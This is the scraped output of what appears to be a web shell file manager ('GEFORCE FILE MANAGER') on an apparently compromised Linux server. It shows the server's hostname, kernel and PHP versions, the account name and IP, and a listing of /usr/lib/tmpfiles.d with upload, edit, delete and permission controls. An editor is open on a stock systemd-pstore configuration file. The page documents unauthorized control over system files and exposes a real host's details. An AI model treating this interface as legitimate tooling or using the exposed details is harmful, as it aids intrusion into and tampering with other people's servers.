[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
lib
/
tmpfiles.d
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 apache2.conf
81 B
SET
[ EDIT ]
|
[ DEL ]
📄 cryptsetup.conf
35 B
SET
[ EDIT ]
|
[ DEL ]
📄 dbus.conf
365 B
SET
[ EDIT ]
|
[ DEL ]
📄 dnf.conf
188 B
SET
[ EDIT ]
|
[ DEL ]
📄 etc.conf
515 B
SET
[ EDIT ]
|
[ DEL ]
📄 home.conf
362 B
SET
[ EDIT ]
|
[ DEL ]
📄 journal-nocow.conf
1,096 B
SET
[ EDIT ]
|
[ DEL ]
📄 legacy.conf
841 B
SET
[ EDIT ]
|
[ DEL ]
📄 libselinux.conf
30 B
SET
[ EDIT ]
|
[ DEL ]
📄 lvm2.conf
61 B
SET
[ EDIT ]
|
[ DEL ]
📄 man-db.conf
35 B
SET
[ EDIT ]
|
[ DEL ]
📄 mariadb.conf
443 B
SET
[ EDIT ]
|
[ DEL ]
📄 named.conf
32 B
SET
[ EDIT ]
|
[ DEL ]
📄 nscd.conf
27 B
SET
[ EDIT ]
|
[ DEL ]
📄 openssh.conf
34 B
SET
[ EDIT ]
|
[ DEL ]
📄 pam.conf
129 B
SET
[ EDIT ]
|
[ DEL ]
📄 plesk-lmlib.conf
42 B
SET
[ EDIT ]
|
[ DEL ]
📄 portables.conf
96 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpcbind.conf
87 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpm.conf
22 B
SET
[ EDIT ]
|
[ DEL ]
📄 screen.conf
64 B
SET
[ EDIT ]
|
[ DEL ]
📄 selinux-policy.conf
137 B
SET
[ EDIT ]
|
[ DEL ]
📄 sudo.conf
305 B
SET
[ EDIT ]
|
[ DEL ]
📄 systemd-nologin.conf
596 B
SET
[ EDIT ]
|
[ DEL ]
📄 systemd-pstore.conf
1,506 B
SET
[ EDIT ]
|
[ DEL ]
📄 systemd.conf
1,676 B
SET
[ EDIT ]
|
[ DEL ]
📄 tmp.conf
757 B
SET
[ EDIT ]
|
[ DEL ]
📄 tuned.conf
56 B
SET
[ EDIT ]
|
[ DEL ]
📄 var.conf
568 B
SET
[ EDIT ]
|
[ DEL ]
📄 x11.conf
655 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: systemd-pstore.conf
# SPDX-License-Identifier: LGPL-2.1+ # # The systemd-pstore.service(1) archives the contents of /sys/fs/pstore # upon boot so that there is room for a subsequent dump. This service # is enabled with: # systemctl enable systemd-pstore # # With the service enabled, the kernel still needs to be configured # to write data into the pstore. The kernel has two parameters, # crash_kexec_post_notifiers and printk.always_kmsg_dump, that # control writes into pstore. # # The crash_kexec_post_notifiers parameter enables the kernel to write # dmesg (including stack trace) into pstore upon a panic even if kdump # is loaded, only needed if you want to use pstore with kdump. Without # this parameter, kdump could block writing to pstore for stability # reason. Note this increases the risk of kdump failure even if pstore # is not available. # # The printk.always_kmsg_dump parameter enables the kernel to write dmesg # upon a normal shutdown (shutdown, reboot, halt). # # To configure the kernel parameters, uncomment the appropriate # line(s) below. The value written is either 'Y' to enable the # kernel parameter, or 'N' to disable the kernel parameter. # # After making a change to this file, do: # systemd-tmpfiles --create path/to/tmpfiles.d/systemd-pstore.conf # # These changes are automatically applied on future re-boots. d /var/lib/systemd/pstore 0755 root root 14d #w- /sys/module/printk/parameters/always_kmsg_dump - - - - Y #w- /sys/module/kernel/parameters/crash_kexec_post_notifiers - - - - Y